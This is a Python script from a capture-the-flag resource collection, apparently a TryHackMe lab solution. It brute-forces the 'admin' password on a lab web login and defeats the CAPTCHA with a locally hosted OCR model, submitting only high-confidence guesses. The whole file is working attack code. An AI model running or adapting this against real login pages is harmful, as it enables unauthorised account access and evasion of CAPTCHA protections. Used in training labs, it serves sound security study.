ctf-resources/thm/aoc23/day16/brute.py

83 lines
2.9 KiB
Python
Raw Normal View History

2024-07-03 21:06:15 +02:00
#!/usr/bin/env python3
import requests
import base64
import json
from bs4 import BeautifulSoup
username = 'admin'
passwords = []
# URLs for our requests
website_url = 'http://hqadmin.thm:8000'
model_url = 'http://localhost:8501/v1/models/ocr:predict'
# Load in the passwords for Brute Forcing
with open('passwords.txt', 'r') as wordlist:
lines = wordlist.readlines()
for line in lines:
passwords.append(line.replace('\n', ''))
access_granted = False
count = 0
# Run the Brute Force Attack until we are out of passwords or have gained access
while(access_granted == False and count < len(passwords)):
# Run a Brute Force for each password
password = passwords[count]
# Connect to webapp to get the CAPTCHA.
# We use a session so the cookies are taken care of for us.
sess = requests.session()
r = sess.get(website_url)
# Use soup to parse the HTML and extract the CAPTCHA image.
soup = BeautifulSoup(r.content, 'html.parser')
img = soup.find('img')
encoded_image = img['src'].split(' ')[1]
# Build the JSON request to send to the CAPTCHA predictor
model_data = {
'signature_name' : 'serving_default',
'inputs' : {'input' : {'b64' : encoded_image} }
}
# Send the CAPTCHA prediction request and load the response
r = requests.post(model_url, json=model_data)
prediction = r.json()
probability = prediction['outputs']['probability']
answer = prediction['outputs']['output']
# Increase our guessing accuracy by only submitting the answer if we are more than 90% sure
if (probability < 0.90):
# If lower than 90%, no submission of CAPTCHA
print('[-] Prediction probability to low, not submitting CAPTCHA')
continue
# Otherwise, submit the answer in a POST data
# Build the POST data
website_data = {
'username' : username,
'password' : password,
'captcha' : answer,
'submit' : 'Submit+Query'
}
# Submit our Brute Force Attack
r = sess.post(website_url, data=website_data)
# Read the response and interpret the results of the attempt
response = r.text
# If the response tells us that we have submitted the wrong CAPTCHA, we try again with this password
if ('Incorrect CAPTCHA value supplied' in response):
print('[-] Incorrect CAPTCHA value was supplied. We will resubmit this password')
continue
# If the response tells us that we have submitted the wrong password, we can try with the next password
elif ('Incorrect Username or Password' in response):
print('[-] Invalid credentials -- Username ' + username + ' Password: ' + password)
count += 1
# Otherwise, we have found the correct password!
else:
print ('[+] Access Granted! -- Username: ' + username + ' Password: ' + password)
access_granted = True